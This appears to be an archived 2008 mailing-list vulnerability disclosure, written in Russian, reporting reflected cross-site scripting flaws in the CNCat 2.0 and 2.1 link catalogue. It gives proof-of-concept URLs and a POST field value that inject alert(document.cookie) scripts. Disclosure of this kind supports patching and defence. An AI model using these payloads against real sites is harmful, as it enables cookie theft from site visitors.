Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability

openPro 1.3.1 (LIBPATH) Remote RFI Vulnerability

[DSECRG-08-029] Local File Include in   Dokeos E-Learning System 1.8.5

communitycms-0.1 Remote File Includion

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	18.07.2008
Subject:	Cross-Site Scripting vulnerabilities in CNCat

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в CNCat.

XSS:

Уязвимости в add.php (можно как через GET, так и через POST), search.php и
index.php.

http://site/add.
php?description=%3C/textarea%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/search.
php?q=%3C/title%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвима версия CNCat 2.0 и предыдущие версии.

Версия CNCat 2.1 также уязвима - в index.php и для POST запроса в add.php.

XSS:

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

POST запрос на странице http://site/add.php

</textarea><script>alert(document.cookie)</script>
В поле Описание.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2263/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua